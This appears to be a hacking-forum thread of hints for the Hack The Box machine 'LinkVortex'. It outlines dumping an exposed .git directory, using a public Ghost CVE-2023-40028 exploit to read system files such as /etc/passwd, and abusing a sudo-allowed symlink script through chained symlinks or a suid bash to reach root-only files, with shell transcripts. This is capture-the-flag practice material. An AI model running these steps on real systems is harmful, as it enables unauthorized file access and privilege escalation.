[Kontoru123]

Dockerfile.ghost has the path to the config file
Use https://github.com/0xyassine/CVE-2023-40028 to read it

For root you can either use chained symlinks to get the root flag / ssh key or just put your code for e.g. a suid bash in the CHECK_CONTENT variable.

I cannot symlink it

---

Dockerfile.ghost has the path to the config file
Use https://github.com/0xyassine/CVE-2023-40028 to read it

For root you can either use chained symlinks to get the root flag / ssh key or just put your code for e.g. a suid bash in the CHECK_CONTENT variable.

I cannot symlink it

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[macavitysworld]

- dump .git
- get creds
- login as admin
- CVE-2023-40028
- read config, to find user password
- sudo privilege

[hint80h]

HTB LinkVortex - Easy writeup

Hidden Content

You must register or login to view this content.

[mhsoraa]

Dockerfile.ghost has the path to the config file
Use https://github.com/0xyassine/CVE-2023-40028 to read it

For root you can either use chained symlinks to get the root flag / ssh key or just put your code for e.g. a suid bash in the CHECK_CONTENT variable.

Thank you...

bob@linkvortex:~$ ln -s /root/root.txt pwn.txt
bob@linkvortex:~$ ln -s /home/bob/pwn.txt pwn.png
bob@linkvortex:~$ sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/pwn.png
Link found [ /home/bob/pwn.png ] , moving it to quarantine
Content:
911be11ee404e95c2e1f273ed2039179
bob@linkvortex:~$

[StingEm]

0000000000000000000000000000000000000000 299cdb4387763f850887275a716153e84793077d root <dev@linkvortex.htb> 1730322603 +0000 clone: from https://github.com/TryGhost/Ghost.git

Which dir is it?? Found the password, but the test user seems incorrect

Use:
http://dev.linkvortex.htb/.git/logs/HEAD for that info:

[DarKGh0sT]

What the heck is this CHECK_CONTENT ?

[StingEm]

What the heck is this CHECK_CONTENT ?

Breakdown of the Command Line

sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/pwn.png

sudo: This part of the command runs the following script with superuser (root) privileges. This is important because some operations might require higher permissions to execute properly.

CHECK_CONTENT=true: This sets an environment variable named CHECK_CONTENT to true. Environment variables can be used by the script to influence its behavior. In this case, it seems like the script may need to know whether to check the content of the file or not. in our case YES

/usr/bin/bash: This specifies that the script should be run using the Bash shell.

/opt/ghost/clean_symlink.sh: This is the path to the script that will be executed. The script is located in the /opt/ghost/ directory and is named clean_symlink.sh.

/home/bob/pwn.png: This is the argument passed to the script. It looks like the script will operate on the file /home/bob/pwn.png.
====
CHECK_CONTENT is not a standard environment variable.
It can be used in any shell scripting language to pass specific settings or configurations to programs.

[xxoro]

https://github.com/0xyassine/CVE-2023-40028  - Look into this - edit the URL and work from there - if you have not found login yet:



YOU WILL LOG IN LIKE THIS:

file> /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash

Check the git repo again for the full path to the config file.
Use it to login with ssh and get the user flag.

did u mean "ghost/core/core/shared/config/env/config.production.json", but in what way did u login if this is correct if not, please tell how to find the creds and is there any login page also? srry but this git stuff is crazy

[htbdesperate]

Hi,
Can anyone explain to me why this happened? I changed the host to linkvortex.htb:
./CVE-2023-40028.sh -u admin@linkvortex.htb -p FOUNDPASSWORD
WELCOME TO THE CVE-2023-40028 SHELL
file> /etc/passwd
ln: failed to create symbolic link './exploit/content/images/2024/I6WM1TUiiJqbx.png': Operation not permitted
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Not Found</pre>
</body>
</html>
rm: cannot remove './exploit/content/images/2024/I6WM1TUiiJqbx.png': No such file or directory
file> ^C

[xxoro]

Hi,
Can anyone explain to me why this happened? I changed the host to linkvortex.htb:
./CVE-2023-40028.sh -u admin@linkvortex.htb -p FOUNDPASSWORD
WELCOME TO THE CVE-2023-40028 SHELL
file> /etc/passwd
ln: failed to create symbolic link './exploit/content/images/2024/I6WM1TUiiJqbx.png': Operation not permitted
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Not Found</pre>
</body>
</html>
rm: cannot remove './exploit/content/images/2024/I6WM1TUiiJqbx.png': No such file or directory
file> ^C

how did u find the password, i am lost